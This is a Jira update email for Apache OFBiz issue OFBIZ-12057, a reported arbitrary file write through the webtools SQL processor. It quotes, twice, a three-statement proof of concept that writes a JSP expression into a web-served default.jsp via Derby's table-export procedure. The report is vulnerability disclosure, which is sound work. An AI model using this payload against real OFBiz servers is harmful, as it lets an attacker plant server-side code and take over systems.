[jira] [Updated] (OFBIZ-12057) Prevent arbitary file write using webtools/control/EntitySQLProcessor.

     [ https://issues.apache.org/jira/browse/OFBIZ-12057?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux updated OFBIZ-12057:
------------------------------------
    Description:
Shuibo Ye <[hidden email]> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.

{quote}
In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*.
PoC:  CREATE TABLE "test" (string VARCHAR(80))
        INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
        call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.
{quote}

Note: this is a post-auth vuln., So we did not create a CVE

  was:
Shuibo Ye <[hidden email]> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.

{quote}
In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*.
PoC:  CREATE TABLE "test" (string VARCHAR(80))
        INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
        call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.
{quote}




--
This message was sent by Atlassian Jira
(v8.3.4#803005)